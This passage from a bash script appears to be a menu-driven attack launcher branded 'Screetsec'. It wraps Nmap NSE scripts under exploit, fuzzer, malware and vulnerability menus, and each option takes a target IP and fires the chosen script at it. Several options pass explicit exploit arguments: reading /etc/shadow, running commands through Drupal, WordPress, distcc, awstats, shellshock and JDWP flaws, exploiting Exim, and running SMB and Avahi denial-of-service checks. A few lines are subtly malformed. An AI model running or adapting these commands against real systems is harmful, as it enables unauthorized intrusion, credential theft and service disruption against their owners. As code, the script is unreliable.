  1548. echo
  1549. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1550. read ip
  1551. $urxvt -p 80 --script http-csrf.nse $ip &
  1552. elif test $cin == '13'
  1553. then
  1554. echo
  1555. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1556. read ip
  1557. $urxvt -sV --script http-dlink-backdoor $ip &
  1558. elif test $cin == '14'
  1559. then
  1560. echo
  1561. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1562. read ip
  1563. $urxvt -p 80 --script http-dombased-xss.nse $ip &
  1564. elif test $cin == '15'
  1565. then
  1566. echo
  1567. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1568. read ip
  1569. $urxvt -p 80 --script http-fileupload-exploiter.nse $ip &
  1570. elif test $cin == '16'
  1571. then
  1572. echo
  1573. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1574. read ip
  1575. $urxvt -p 80 --script http-huawei-hg5xx-vuln $ip &
  1576. elif test $cin == '17'
  1577. then
  1578. echo
  1579. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1580. read ip
  1581. $urxvt -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip &
  1582. elif test $cin == '18'
  1583. then
  1584. echo
  1585. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1586. read ip
  1587. $urxvt -p 80 --script http-majordomo2-dir-traversal $ip &
  1588. elif test $cin == '19'
  1589. then
  1590. echo
  1591. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1592. read ip
  1593. $urxvt -p 80 --script http-phpmyadmin-dir-traversal $ip &
  1594. elif test $cin == '20'
  1595. then
  1596. echo
  1597. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1598. read ip
  1599. $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip &
  1600. elif test $cin == '21'
  1601. then
  1602. echo
  1603. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1604. read ip
  1605. $urxvt -p 80 --script http-stored-xss.nse $ip &
  1606. elif test $cin == '22'
  1607. then
  1608. echo
  1609. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1610. read ip
  1611. $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip &
  1612. elif test $cin == '23'
  1613. then
  1614. echo
  1615. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1616. read ip
  1617. $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip &
  1618. elif test $cin == '24'
  1619. then
  1620. echo
  1621. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1622. read ip
  1623. $urxvt --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" $ip &
  1624. elif test $cin == '25'
  1625. then
  1626. echo
  1627. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1628. read ip
  1629. $urxvt -sV --script http-vuln-cve2012-1823 $ip &
  1630. elif test $cin == '26'
  1631. then
  1632. echo
  1633. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1634. read ip
  1635. $urxvt -sV --script http-vuln-cve2013-0156 $ip &
  1636. elif test $cin == '27'
  1637. then
  1638. echo
  1639. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1640. read ip
  1641. $urxvt -sV http-rompager-xss $ip &
  1642. elif test $cin == '28'
  1643. then
  1644. echo
  1645. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1646. read ip
  1647. $urxvt -p 80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra $ip &
  1648. elif test $cin == '29'
  1649. then
  1650. echo
  1651. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1652. read ip
  1653. $urxvt --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" $ip &
  1654. elif test $cin == '30'
  1655. then
  1656. echo
  1657. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1658. read ip
  1659. $urxvt --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" $ip &
  1660. elif test $cin == '31'
  1661. then
  1662. echo
  1663. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1664. read ip
  1665. $urxvt -sV --script http-vuln-wnr1000-creds $ip -p 80 &
  1666. elif test $cin == '32'
  1667. then
  1668. echo
  1669. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1670. read ip
  1671. $urxvt -sV --script=irc-unrealircd-backdoor $ip &
  1672. elif test $cin == '33'
  1673. then
  1674. echo
  1675. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1676. read ip
  1677. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  1678. read port
  1679. $urxvt -sT $ip -p $port --script=+jdwp-exec --script-args cmd="date" &
  1680. elif test $cin == '34'
  1681. then
  1682. echo
  1683. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1684. read ip
  1685. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  1686. read port
  1687. $urxvt -sT $ip -p $port --script=+jdwp-inject --script-args filename=HelloWorld.class &
  1688. elif test $cin == '35'
  1689. then
  1690. echo
  1691. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1692. read ip
  1693. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  1694. read port
  1695. $urxvt --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p $port $ip &
  1696. elif test $cin == '36'
  1697. then
  1698. echo
  1699. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1700. read ip
  1701. $urxvt --script smb-vuln-conficker.nse -p 445 $ip &
  1702. elif test $cin == '37'
  1703. then
  1704. echo
  1705. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1706. read ip
  1707. $urxvt --script smb-vuln-cve2009-3103.nse -p 445 $ip &
  1708. elif test $cin == '38'
  1709. then
  1710. echo
  1711. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1712. read ip
  1713. $urxvt --script smb-vuln-ms06-025.nse -p 445 $ip &
  1714. elif test $cin == '39'
  1715. then
  1716. echo
  1717. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1718. read ip
  1719. $urxvt --script smb-vuln-ms07-029.nse -p 445 $ip &
  1720. elif test $cin == '40'
  1721. then
  1722. echo
  1723. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1724. read ip
  1725. $urxvt --script smb-vuln-ms08-067.nse -p 445 $ip &
  1726. elif test $cin == '41'
  1727. then
  1728. echo
  1729. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1730. read ip
  1731. $urxvt --script smb-vuln-regsvc-dos.nse -p 445 $ip &
  1732. elif test $cin == '42'
  1733. then
  1734. echo
  1735. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1736. read ip
  1737. $urxvt --script=smtp-vuln-cve2010-4344 --script-args="smtp-vuln-cve2010-4344.exploit" -pT:25,465,587 $ip &
  1738. elif test $cin == '43'
  1739. then
  1740. echo
  1741. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1742. read ip
  1743. $urxvt -p49152 --script supermicro-ipmi-conf $ip &
  1744. elif test $cin == '44'
  1745. then
  1746. nse
  1747. else
  1748. echo ""
  1749. echo -e $okegreen " Incorrect Number"
  1750. fi
  1751. echo ""
  1752. echo ""
  1753. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  1754. read back
  1755. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  1756. then
  1757. clear
  1758. menu
  1759. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  1760. then
  1761. exploit
  1762. fi
  1763. }
  1766. function fuzzer () {
  1767. clear
  1768. echo
  1769. echo
  1770. echo -e $white" [$okegreen"01"$white]$cyan File dns-fuzz "
  1771. echo -e $white" [$okegreen"02"$white]$cyan File http-form-fuzzer "
  1772. echo -e $white" [$okegreen"03"$white]$cyan File http-phpself-xss "
  1773. echo -e $white" [$okegreen"04"$white]$cyan Back "
  1774. echo -e " "
  1775. echo -n -e $red' \033[4mScreetsec@nse-fuzzer:\033[0m>> '; tput sgr0 #insert your choice
  1776. read win
  1777. if test $win == '1'
  1778. then
  1779. echo
  1780. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1781. read ip
  1782. $urxvt -sU --script dns-fuzz --script-args timelimit=2h $ip &
  1783. elif test $win == '2'
  1784. then
  1785. echo
  1786. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1787. read ip
  1788. $urxvt --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip &
  1789. elif test $win == '3'
  1790. then
  1791. echo
  1792. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1793. read ip
  1794. $urxvt --script=http-phpself-xss -p80 $ip &
  1795. elif test $win == '4'
  1796. then
  1797. nse
  1798. else
  1799. echo ""
  1800. echo -e $okegreen " Incorrect Number"
  1801. fi
  1802. echo ""
  1803. echo ""
  1804. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  1805. read back
  1806. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  1807. then
  1808. clear
  1809. menu
  1810. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  1811. then
  1812. fuzzer
  1813. fi
  1814. }
  1817. function malware () {
  1818. clear
  1819. echo
  1820. echo
  1821. echo -e $white" [$okegreen"01"$white]$cyan auth-spoof "
  1822. echo -e $white" [$okegreen"02"$white]$cyan dns-zeustracker "
  1823. echo -e $white" [$okegreen"03"$white]$cyan ftp-proftpd-backdoor "
  1824. echo -e $white" [$okegreen"04"$white]$cyan ftp-vsftpd-backdoor "
  1825. echo -e $white" [$okegreen"05"$white]$cyan http-google-malware "
  1826. echo -e $white" [$okegreen"06"$white]$cyan http-malware-host "
  1827. echo -e $white" [$okegreen"07"$white]$cyan http-virustotal "
  1828. echo -e $white" [$okegreen"08"$white]$cyan irc-unrealircd-backdoor "
  1829. echo -e $white" [$okegreen"09"$white]$cyan smtp-strangeport "
  1830. echo -e $white" [$okegreen"10"$white]$cyan back "
  1831. echo
  1832. echo -n -e $red' \033[4mScreetsec@nse-malware:\033[0m>> '; tput sgr0 #insert your choice
  1833. read malw
  1834. if test $malw == '1'
  1835. then
  1836. echo
  1837. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1838. read ip
  1839. $urxvt -sV --script=auth-spoof $ip &
  1840. elif test $malw == '2'
  1841. then
  1842. echo
  1843. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1844. read ip
  1845. $urxvt -sn -PN --script=dns-zeustracker $ip &
  1846. elif test $malw == '3'
  1847. then
  1848. echo
  1849. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1850. read ip
  1851. $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
  1852. elif test $malw == '4'
  1853. then
  1854. echo
  1855. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1856. read ip
  1857. $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
  1858. elif test $malw == '5'
  1859. then
  1860. echo
  1861. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1862. read ip
  1863. $urxvt -p80 --script http-google-malware $ip &
  1864. elif test $malw == '6'
  1865. then
  1866. echo
  1867. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1868. read ip
  1869. $urxvt -sV --script=http-malware-host $ip &
  1870. elif test $malw == '7'
  1871. then
  1872. echo
  1873. echo -ne $okegreen " an API key acquired from the virustotal web page: " ; tput sgr0
  1874. read key
  1875. echo -ne $okegreen " a SHA1, SHA256, MD5 checksum of a file to check: " ; tput sgr0
  1876. read sum
  1877. $urxvt --script http-virustotal --script-args="http-virustotal.apikey="$key",http-virustotal.checksum="$sum"" &
  1878. elif test $malw == '8'
  1879. then
  1880. echo
  1881. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1882. read ip
  1883. $urxvt-sV --script=irc-unrealircd-backdoor $ip &
  1884. elif test $malw == '9'
  1885. then
  1886. echo
  1887. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  1888. read ip
  1889. $urxvt -sV --script=smtp-strangeport $ip &
  1890. elif test $malw == '10'
  1891. then
  1892. nse
  1893. else
  1894. echo ""
  1895. echo -e $okegreen " Incorrect Number"
  1896. fi
  1897. echo ""
  1898. echo ""
  1899. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  1900. read back
  1901. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  1902. then
  1903. clear
  1904. menu
  1905. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  1906. then
  1907. malware
  1908. fi
  1909. }
  1912. #!/bin/bash
  1915. function vuln () {
  1918. clear
  1919. echo
  1920. echo -e $white" [$okegreen"01"$white]$cyan afp-path-vuln "
  1921. echo -e $white" [$okegreen"02"$white]$cyan broadcast-avahi-dos "
  1922. echo -e $white" [$okegreen"03"$white]$cyan clamav-exec "
  1923. echo -e $white" [$okegreen"04"$white]$cyan distcc-cve2004-2687 "
  1924. echo -e $white" [$okegreen"05"$white]$cyan dns-update "
  1925. echo -e $white" [$okegreen"06"$white]$cyan firewall-bypass "
  1926. echo -e $white" [$okegreen"07"$white]$cyan ftp-libopie "
  1927. echo -e $white" [$okegreen"08"$white]$cyan ftp-proftpd-backdoor "
  1928. echo -e $white" [$okegreen"09"$white]$cyan ftp-vsftpd-backdoor "
  1929. echo -e $white" [$okegreen"10"$white]$cyan ftp-vuln-cve2010-4221 "
  1930. echo -e $white" [$okegreen"11"$white]$cyan http-adobe-coldfusion-apsa1301 "
  1931. echo -e $white" [$okegreen"12"$white]$cyan http-aspnet-debug "
  1932. echo -e $white" [$okegreen"13"$white]$cyan http-avaya-ipoffice-users "
  1933. echo -e $white" [$okegreen"14"$white]$cyan http-awstatstotals-exec "
  1934. echo -e $white" [$okegreen"15"$white]$cyan http-axis2-dir-traversal "
  1935. echo -e $white" [$okegreen"16"$white]$cyan http-cross-domain-policy "
  1936. echo -e $white" [$okegreen"17"$white]$cyan http-csrf "
  1937. echo -e $white" [$okegreen"18"$white]$cyan http-dlink-backdoor "
  1938. echo -e $white" [$okegreen"19"$white]$cyan http-dombased-xss "
  1939. echo -e $white" [$okegreen"20"$white]$cyan http-enum "
  1940. echo -e $white" [$okegreen"21"$white]$cyan http-fileupload-exploiter "
  1941. echo -e $white" [$okegreen"22"$white]$cyan http-frontpage-login "
  1942. echo -e $white" [$okegreen"23"$white]$cyan http-git "
  1943. echo -e $white" [$okegreen"24"$white]$cyan http-huawei-hg5xx-vuln "
  1944. echo -e $white" [$okegreen"25"$white]$cyan http-iis-webdav-vuln "
  1945. echo -e $white" [$okegreen"26"$white]$cyan http-internal-ip-disclosure "
  1946. echo -e $white" [$okegreen"27"$white]$cyan http-litespeed-sourcecode-download "
  1947. echo -e $white" [$okegreen"28"$white]$cyan http-majordomo2-dir-traversal "
  1948. echo -e $white" [$okegreen"29"$white]$cyan http-method-tamper "
  1949. echo -e $white" [$okegreen"30"$white]$cyan http-passwd "
  1950. echo -e $white" [$okegreen"31"$white]$cyan http-phpmyadmin-dir-traversal "
  1951. echo -e $white" [$okegreen"32"$white]$cyan http-phpself-xss "
  1952. echo -e $white" [$okegreen"33"$white]$cyan http-shellshock "
  1953. echo -e $white" [$okegreen"34"$white]$cyan http-slowloris-check "
  1954. echo -e $white" [$okegreen"35"$white]$cyan http-sql-injection "
  1955. echo -e $white" [$okegreen"36"$white]$cyan http-stored-xss "
  1956. echo -e $white" [$okegreen"37"$white]$cyan http-tplink-dir-traversal "
  1957. echo -e $white" [$okegreen"38"$white]$cyan http-trace "
  1958. echo -e $white" [$okegreen"39"$white]$cyan http-vmware-path-vuln "
  1959. echo -e $white" [$okegreen"40"$white]$cyan http-vuln-cve2006-3392 "
  1960. echo -e $white" [$okegreen"41"$white]$cyan http-vuln-cve2010-0738 "
  1961. echo -e $white" [$okegreen"42"$white]$cyan http-vuln-cve2010-2861 "
  1962. echo -e $white" [$okegreen"43"$white]$cyan http-vuln-cve2011-3192 "
  1963. echo -e $white" [$okegreen"44"$white]$cyan http-vuln-cve2011-3368 "
  1964. echo -e $white" [$okegreen"45"$white]$cyan http-vuln-cve2012-1823 "
  1965. echo -e $white" [$okegreen"46"$white]$cyan http-vuln-cve2013-0156 "
  1966. echo -e $white" [$okegreen"47"$white]$cyan http-vuln-cve2013-6786 "
  1967. echo -e $white" [$okegreen"48"$white]$cyan http-vuln-cve2013-7091 "
  1968. echo -e $white" [$okegreen"49"$white]$cyan http-vuln-cve2014-2126 "
  1969. echo -e $white" [$okegreen"50"$white]$cyan http-vuln-cve2014-2127 "
  1970. echo -e $white" [$okegreen"51"$white]$cyan http-vuln-cve2014-2128 "
  1971. echo -e $white" [$okegreen"52"$white]$cyan http-vuln-cve2014-2129 "
  1972. echo -e $white" [$okegreen"53"$white]$cyan http-vuln-cve2014-3704 "
  1973. echo -e $white" [$okegreen"54"$white]$cyan http-vuln-cve2014-8877 "
  1974. echo -e $white" [$okegreen"55"$white]$cyan http-vuln-cve2015-1427 "
  1975. echo -e $white" [$okegreen"56"$white]$cyan http-vuln-cve2015-1635 "
  1976. echo -e $white" [$okegreen"57"$white]$cyan http-vuln-misfortune-cookie "
  1977. echo -e $white" [$okegreen"58"$white]$cyan http-vuln-wnr1000-creds "
  1978. echo -e $white" [$okegreen"59"$white]$cyan http-wordpress-users "
  1979. echo -e $white" [$okegreen"60"$white]$cyan ipmi-cipher-zero "
  1980. echo -e $white" [$okegreen"61"$white]$cyan irc-botnet-channels "
  1981. echo -e $white" [$okegreen"62"$white]$cyan irc-unrealircd-backdoor "
  1982. echo -e $white" [$okegreen"63"$white]$cyan mysql-vuln-cve2012-2122 "
  1983. echo -e $white" [$okegreen"64"$white]$cyan netbus-auth-bypass "
  1984. echo -e $white" [$okegreen"65"$white]$cyan qconn-exec "
  1985. echo -e $white" [$okegreen"66"$white]$cyan rdp-vuln-ms12-020 "
  1986. echo -e $white" [$okegreen"67"$white]$cyan rmi-vuln-classloader "
  1987. echo -e $white" [$okegreen"68"$white]$cyan samba-vuln-cve-2012-1182 "
  1988. echo -e $white" [$okegreen"69"$white]$cyan smb-vuln-conficker "
  1989. echo -e $white" [$okegreen"70"$white]$cyan smb-vuln-cve2009-3103 "
  1990. echo -e $white" [$okegreen"71"$white]$cyan smb-vuln-ms06-025 "
  1991. echo -e $white" [$okegreen"72"$white]$cyan smb-vuln-ms07-029 "
  1992. echo -e $white" [$okegreen"73"$white]$cyan smb-vuln-ms08-067 "
  1993. echo -e $white" [$okegreen"74"$white]$cyan smb-vuln-ms10-054 "
  1994. echo -e $white" [$okegreen"75"$white]$cyan smb-vuln-ms10-061 "
  1995. echo -e $white" [$okegreen"76"$white]$cyan smb-vuln-regsvc-dos "
  1996. echo -e $white" [$okegreen"77"$white]$cyan smtp-vuln-cve2010-4344 "
  1997. echo -e $white" [$okegreen"78"$white]$cyan smtp-vuln-cve2011-1720 "
  1998. echo -e $white" [$okegreen"79"$white]$cyan smtp-vuln-cve2011-1764 "
  1999. echo -e $white" [$okegreen"80"$white]$cyan ssl-ccs-injection "
  2000. echo -e $white" [$okegreen"81"$white]$cyan ssl-cert-intaddr "
  2001. echo -e $white" [$okegreen"82"$white]$cyan ssl-dh-params "
  2002. echo -e $white" [$okegreen"83"$white]$cyan ssl-heartbleed "
  2003. echo -e $white" [$okegreen"84"$white]$cyan ssl-known-key "
  2004. echo -e $white" [$okegreen"85"$white]$cyan ssl-poodle "
  2005. echo -e $white" [$okegreen"86"$white]$cyan sslv2-drown "
  2006. echo -e $white" [$okegreen"87"$white]$cyan supermicro-ipmi-conf "
  2007. echo -e $white" [$okegreen"88"$white]$cyan wdb-version "
  2008. echo -e $white" [$okegreen"89"$white]$cyan back "
  2009. echo -e " "
  2010. echo -n -e $red' \033[4mScreetsec@nse-vuln:\033[0m>> '; tput sgr0 #insert your choice
  2011. read vuln
  2012. if test $vuln == '1'
  2013. then
  2014. echo
  2015. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2016. read ip
  2017. $urxvt -sV --script=afp-path-vuln $ip &
  2018. elif test $vuln == '2'
  2019. then
  2020. echo
  2021. $urxvt --script=broadcast-avahi-dos &
  2022. elif test $vuln == '3'
  2023. then
  2024. echo
  2025. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2026. read ip
  2027. $urxvt -sV --script clamav-exec $ip &
  2028. elif test $vuln == '4'
  2029. then
  2030. echo
  2031. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2032. read ip
  2033. $urxvt -p 3632 $ip --script distcc-exec --script-args="distcc-exec.cmd='id'" &
  2034. elif test $vuln == '5'
  2035. then
  2036. echo
  2037. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2038. read ip
  2039. $urxvt -sU -p 53 --script=dns-update,dns-update.ip= $ip &
  2040. elif test $vuln == '6'
  2041. then
  2042. echo
  2043. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2044. read ip
  2045. $urxvt --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 $ip &
  2046. elif test $vuln == '7'
  2047. then
  2048. echo
  2049. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2050. read ip
  2051. $urxvt -sV --script=ftp-libopie $ip &
  2052. elif test $vuln == '8'
  2053. then
  2054. echo
  2055. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2056. read ip
  2057. $urxvt --script ftp-proftpd-backdoor -p 21 $ip &
  2058. elif test $vuln == '9'
  2059. then
  2060. echo
  2061. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2062. read ip
  2063. $urxvt --script ftp-vsftpd-backdoor -p 21 $ip &
  2064. elif test $vuln == '10'
  2065. then
  2066. echo
  2067. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2068. read ip
  2069. echo -ne $okegreen " What is your Port Target or Host: " ; tput sgr0
  2070. read port
  2071. $urxvt --script ftp-vuln-cve2010-4221 -p $port $ip &
  2072. elif test $vuln == '11'
  2073. then
  2074. echo
  2075. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2076. read ip
  2077. $urxvt -p 80 --script http-adobe-coldfusion-apsa1301 --script-args basepath=/cf/adminapi/ $ip &
  2078. elif test $vuln == '12'
  2079. then
  2080. echo
  2081. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2082. read ip
  2083. $urxvt --script http-debug --script-args http-aspnet-debug.path=/path $ip &
  2084. elif test $vuln == '13'
  2085. then
  2086. echo
  2087. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2088. read ip
  2089. $urxvt -sV --script http-avaya-ipoffice-users $ip &
  2090. elif test $vuln == '14'
  2091. then
  2092. echo
  2093. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2094. read ip
  2095. $urxvt -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' $ip &
  2096. elif test $vuln == '15'
  2097. then
  2098. echo
  2099. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2100. read ip
  2101. $urxvt -p 80 --script http-axis2-dir-traversal $ip &
  2102. elif test $vuln == '16'
  2103. then
  2104. echo
  2105. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2106. read ip
  2107. $urxvt -p 80 --script http-crossdomainxml --script-args http.domain-lookup=true $ip &
  2108. elif test $vuln == '17'
  2109. then
  2110. echo
  2111. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2112. read ip
  2113. $urxvt -p 80 --script http-csrf.nse $ip &
  2114. elif test $vuln == '18'
  2115. then
  2116. echo
  2117. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2118. read ip
  2119. $urxvt -sV --script http-dlink-backdoor $ip &
  2120. elif test $vuln == '19'
  2121. then
  2122. echo
  2123. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2124. read ip
  2125. $urxvt -p 80 --script http-dombased-xss.nse $ip &
  2126. elif test $vuln == '20'
  2127. then
  2128. echo
  2129. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2130. read ip
  2131. $urxvt -sV --script=http-enum $ip &
  2132. elif test $vuln == '21'
  2133. then
  2134. echo
  2135. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2136. read ip
  2137. $urxvt -p 80 --script http-fileupload-exploiter.nse $ip &
  2138. elif test $vuln == '22'
  2139. then
  2140. echo
  2141. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2142. read ip
  2143. $urxvt $ip -p 80 --script=http-frontpage-login &
  2144. elif test $vuln == '23'
  2145. then
  2146. echo
  2147. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2148. read ip
  2149. $urxvt sV -sC $ip &
  2150. elif test $vuln == '24'
  2151. then
  2152. echo
  2153. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2154. read ip
  2155. $urxvt -sV http-huawei-hg5xx-vuln $ip &
  2156. elif test $vuln == '25'
  2157. then
  2158. echo
  2159. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2160. read ip
  2161. $urxvt --script http-iis-webdav-vuln -p 80,8080 $ip &
  2162. elif test $vuln == '26'
  2163. then
  2164. echo
  2165. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2166. read ip
  2167. $urxvt --script http-internal-ip-disclosure --script-args http-internal-ip-disclosure.path=/path $ip &
  2168. elif test $vuln == '27'
  2169. then
  2170. echo
  2171. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2172. read ip
  2173. $urxvt -p 80,8080 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php $ip &
  2174. elif test $vuln == '28'
  2175. then
  2176. echo
  2177. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2178. read ip
  2179. $urxvt -p 80 --script http-majordomo2-dir-traversal $ip &
  2180. elif test $vuln == '29'
  2181. then
  2182. echo
  2183. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2184. read ip
  2185. $urxvt -p80 --script http-method-tamper --script-args 'http-method-tamper.paths={/protected/db.php,/protected/index.php}' $ip &
  2186. elif test $vuln == '30'
  2187. then
  2188. echo
  2189. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2190. read ip
  2191. $urxvt --script http-passwd --script-args http-passwd.root=/test/ $ip &
  2192. elif test $vuln == '31'
  2193. then
  2194. echo
  2195. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2196. read ip
  2197. $urxvt -p80 --script http-phpmyadmin-dir-traversal $ip &
  2198. elif test $vuln == '32'
  2199. then
  2200. echo
  2201. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2202. read ip
  2203. $urxvt -sV --script http-self-xss $ip &
  2204. elif test $vuln == '33'
  2205. then
  2206. echo
  2207. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2208. read ip
  2209. $urxvt -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls $ip &
  2210. elif test $vuln == '34'
  2211. then
  2212. echo
  2213. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2214. read ip
  2215. $urxvt --script http-slowloris-check $ip &
  2216. elif test $vuln == '35'
  2217. then
  2218. echo
  2219. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2220. read ip
  2221. $urxvt -sV --script=http-sql-injection $ip &
  2222. elif test $vuln == '36'
  2223. then
  2224. echo
  2225. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2226. read ip
  2227. $urxvt -p 80 --script http-stored-xss.nse $ip &
  2228. elif test $vuln == '37'
  2229. then
  2230. echo
  2231. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2232. read ip
  2233. $urxvt -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn $ip &
  2234. elif test $vuln == '38'
  2235. then
  2236. echo
  2237. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2238. read ip
  2239. $urxvt --script http-trace -d $ip &
  2240. elif test $vuln == '39'
  2241. then
  2242. echo
  2243. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2244. read ip
  2245. $urxvt --script http-vmware-path-vuln -p80,443,8222,8333 $ip &
  2246. elif test $vuln == '40'
  2247. then
  2248. echo
  2249. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2250. read ip
  2251. $urxvt -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow $ip &
  2252. elif test $vuln == '41'
  2253. then
  2254. echo
  2255. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  2256. read ip
